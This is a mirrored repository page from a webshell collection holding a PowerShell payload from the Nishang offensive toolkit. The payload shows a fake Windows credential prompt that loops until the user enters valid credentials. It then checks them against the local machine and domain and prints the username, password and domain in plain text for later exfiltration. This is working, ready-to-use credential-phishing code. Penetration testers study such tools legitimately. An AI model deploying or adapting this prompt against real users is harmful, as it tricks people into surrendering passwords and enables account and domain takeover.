mirror of
https://github.com/tennc/webshell
synced 2024-12-01 23:49:09 +00:00
50 lines
1.6 KiB
PowerShell
50 lines
1.6 KiB
PowerShell
|
<#
|
||
|
|
.SYNOPSIS
|
||
|
|
Nishang Payload which opens a user credential prompt.
|
||
|
|
|
||
|
|
.DESCRIPTION
|
||
|
|
This payload opens a prompt which asks for user credentials and
|
||
|
|
does not go away till valid credentials are entered in the prompt.
|
||
|
|
The credentials can then exfiltrated using method of choice.
|
||
|
|
|
||
|
|
.EXAMPLE
|
||
|
|
PS > Credentials
|
||
|
|
|
||
|
|
.LINK
|
||
|
|
http://labofapenetrationtester.blogspot.com/
|
||
|
|
https://github.com/samratashok/nishang
|
||
|
|
#>
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
function Credentials
|
||
|
|
{
|
||
|
|
[CmdletBinding()]
|
||
|
|
Param ()
|
||
|
|
|
||
|
|
$ErrorActionPreference="SilentlyContinue"
|
||
|
|
Add-Type -assemblyname system.DirectoryServices.accountmanagement
|
||
|
|
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
|
||
|
|
$domainDN = "LDAP://" + ([ADSI]"").distinguishedName
|
||
|
|
while($true)
|
||
|
|
{
|
||
|
|
$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
|
||
|
|
if($credential)
|
||
|
|
{
|
||
|
|
$creds = $credential.GetNetworkCredential()
|
||
|
|
[String]$user = $creds.username
|
||
|
|
[String]$pass = $creds.password
|
||
|
|
[String]$domain = $creds.domain
|
||
|
|
$authlocal = $DS.ValidateCredentials($user, $pass)
|
||
|
|
$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
|
||
|
|
if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
|
||
|
|
{
|
||
|
|
$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
|
||
|
|
$output
|
||
|
|
break
|
||
|
|
}
|
||
|
|
}
|
||
|
|
}
|
||
|
|
}
|